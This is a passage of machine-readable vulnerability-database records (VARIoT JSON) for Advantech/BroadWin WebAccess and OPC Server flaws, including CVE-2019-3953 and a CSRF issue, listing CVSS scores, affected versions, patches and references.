Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0240" }, { "db": "JVNDB", "id": "JVNDB-2012-001558" }, { "db": "CNVD", "id": "CNVD-2012-0669" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "19cc98cc-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53521" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0240", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-416", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0669", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001558", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "19CC98CC-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-53521", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "19cc98cc-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0669" }, { "db": "VULHUB", "id": "VHN-53521" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001558" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-416" }, { "db": "NVD", "id": "CVE-2012-0240" } ] }, "id": "VAR-201202-0220", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "19cc98cc-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0669" }, { "db": "VULHUB", "id": "VHN-53521" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "19cc98cc-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0669" } ] }, "last_update_date": "2024-11-23T21:46:31.514000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Vulnerability (CNVD-2012-0669)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10271" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0669" }, { "db": "JVNDB", "id": "JVNDB-2012-001558" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-287", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-53521" }, { "db": "JVNDB", "id": "JVNDB-2012-001558" }, { "db": "NVD", "id": "CVE-2012-0240" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0240" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0240" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0669" }, { "db": "VULHUB", "id": "VHN-53521" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001558" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-416" }, { "db": "NVD", "id": "CVE-2012-0240" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "19cc98cc-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0669" }, { "db": "VULHUB", "id": "VHN-53521" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001558" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-416" }, { "db": "NVD", "id": "CVE-2012-0240" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "19cc98cc-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0669" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-53521" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001558" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-416" }, { "date": "2012-02-21T13:31:57.157000", "db": "NVD", "id": "CVE-2012-0240" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0669" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-53521" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001558" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-416" }, { "date": "2024-11-21T01:34:38.700000", "db": "NVD", "id": "CVE-2012-0240" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-416" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess of GbScriptAddUp.asp Vulnerable to arbitrary code execution", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001558" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "authorization issue", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-416" } ], "trust": 0.6 } }
var-201906-0329
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess/SCADA 8.4.0 allows a remote, unauthenticated attacker to execute arbitrary code by sending a crafted IOCTL 10012 RPC call. Advantech WebAccess/SCADA Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. AdvantechWebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A stack-based buffer overflow vulnerability exists in AdvantechWebAccess/SCADA version 8.4.0. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201906-0329", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.8, "vendor": "advantech", "version": "8.4.0" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.4.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.4.0" } ], "sources": [ { "db": "IVD", "id": "fa262f58-bb0d-42b5-8fe7-ab4f4fa95260" }, { "db": "CNVD", "id": "CNVD-2019-18756" }, { "db": "JVNDB", "id": "JVNDB-2019-005593" }, { "db": "NVD", "id": "CVE-2019-3953" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-005593" } ] }, "cve": "CVE-2019-3953", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-3953", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2019-18756", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "fa262f58-bb0d-42b5-8fe7-ab4f4fa95260", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-155388", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-3953", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-3953", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2019-3953", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2019-18756", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201906-719", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "fa262f58-bb0d-42b5-8fe7-ab4f4fa95260", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-155388", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "fa262f58-bb0d-42b5-8fe7-ab4f4fa95260" }, { "db": "CNVD", "id": "CNVD-2019-18756" }, { "db": "VULHUB", "id": "VHN-155388" }, { "db": "JVNDB", "id": "JVNDB-2019-005593" }, { "db": "CNNVD", "id": "CNNVD-201906-719" }, { "db": "NVD", "id": "CVE-2019-3953" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess/SCADA 8.4.0 allows a remote, unauthenticated attacker to execute arbitrary code by sending a crafted IOCTL 10012 RPC call. Advantech WebAccess/SCADA Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. AdvantechWebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A stack-based buffer overflow vulnerability exists in AdvantechWebAccess/SCADA version 8.4.0. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow", "sources": [ { "db": "NVD", "id": "CVE-2019-3953" }, { "db": "JVNDB", "id": "JVNDB-2019-005593" }, { "db": "CNVD", "id": "CNVD-2019-18756" }, { "db": "IVD", "id": "fa262f58-bb0d-42b5-8fe7-ab4f4fa95260" }, { "db": "VULHUB", "id": "VHN-155388" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-3953", "trust": 3.3 }, { "db": "TENABLE", "id": "TRA-2019-28", "trust": 2.4 }, { "db": "TENABLE", "id": "TRA-2019-17", "trust": 2.3 }, { "db": "CNNVD", "id": "CNNVD-201906-719", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-18756", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-005593", "trust": 0.8 }, { "db": "IVD", "id": "FA262F58-BB0D-42B5-8FE7-AB4F4FA95260", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-155388", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "fa262f58-bb0d-42b5-8fe7-ab4f4fa95260" }, { "db": "CNVD", "id": "CNVD-2019-18756" }, { "db": "VULHUB", "id": "VHN-155388" }, { "db": "JVNDB", "id": "JVNDB-2019-005593" }, { "db": "CNNVD", "id": "CNNVD-201906-719" }, { "db": "NVD", "id": "CVE-2019-3953" } ] }, "id": "VAR-201906-0329", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "fa262f58-bb0d-42b5-8fe7-ab4f4fa95260" }, { "db": "CNVD", "id": "CNVD-2019-18756" }, { "db": "VULHUB", "id": "VHN-155388" } ], "trust": 1.4466745799999998 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "fa262f58-bb0d-42b5-8fe7-ab4f4fa95260" }, { "db": "CNVD", "id": "CNVD-2019-18756" } ] }, "last_update_date": "2024-11-23T22:33:57.006000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Patch for AdvantechWebAccess/SCADA Buffer Overflow Vulnerability (CNVD-2019-18756)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/164241" }, { "title": "Advantech WebAccess/SCADA Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93903" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-18756" }, { "db": "JVNDB", "id": "JVNDB-2019-005593" }, { "db": "CNNVD", "id": "CNNVD-201906-719" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-119", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-155388" }, { "db": "JVNDB", "id": "JVNDB-2019-005593" }, { "db": "NVD", "id": "CVE-2019-3953" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.4, "url": "https://www.tenable.com/security/research/tra-2019-28" }, { "trust": 2.3, "url": "https://www.tenable.com/security/research/tra-2019-17" }, { "trust": 2.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3953" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3953" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-18756" }, { "db": "VULHUB", "id": "VHN-155388" }, { "db": "JVNDB", "id": "JVNDB-2019-005593" }, { "db": "CNNVD", "id": "CNNVD-201906-719" }, { "db": "NVD", "id": "CVE-2019-3953" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "fa262f58-bb0d-42b5-8fe7-ab4f4fa95260" }, { "db": "CNVD", "id": "CNVD-2019-18756" }, { "db": "VULHUB", "id": "VHN-155388" }, { "db": "JVNDB", "id": "JVNDB-2019-005593" }, { "db": "CNNVD", "id": "CNNVD-201906-719" }, { "db": "NVD", "id": "CVE-2019-3953" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-06-21T00:00:00", "db": "IVD", "id": "fa262f58-bb0d-42b5-8fe7-ab4f4fa95260" }, { "date": "2019-06-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-18756" }, { "date": "2019-06-18T00:00:00", "db": "VULHUB", "id": "VHN-155388" }, { "date": "2019-06-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005593" }, { "date": "2019-06-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-719" }, { "date": "2019-06-18T23:15:10.527000", "db": "NVD", "id": "CVE-2019-3953" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-06-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-18756" }, { "date": "2020-08-24T00:00:00", "db": "VULHUB", "id": "VHN-155388" }, { "date": "2019-06-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005593" }, { "date": "2020-08-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-719" }, { "date": "2024-11-21T04:42:56.070000", "db": "NVD", "id": "CVE-2019-3953" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201906-719" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess/SCADA Buffer error vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-005593" }, { "db": "CNNVD", "id": "CNNVD-201906-719" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "fa262f58-bb0d-42b5-8fe7-ab4f4fa95260" }, { "db": "CNNVD", "id": "CNNVD-201906-719" } ], "trust": 0.8 } }
var-201202-0343
Vulnerability from variot
Cross-site request forgery (CSRF) vulnerability in Advantech/BroadWin WebAccess 7.0 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0235. Advantech/BroadWin WebAccess Contains a cross-site request forgery vulnerability. BroadWin SCADA WebAccess is a web browser-based HMI and SCADA software for industrial control systems and automation
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0343", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "*" }, { "model": "advantech/broadwin", "scope": "eq", "trust": 0.6, "vendor": "webaccess", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" } ], "sources": [ { "db": "IVD", "id": "1a0e738c-2354-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d789810-463f-11e9-88a7-000c29342cb1" }, { "db": "IVD", "id": 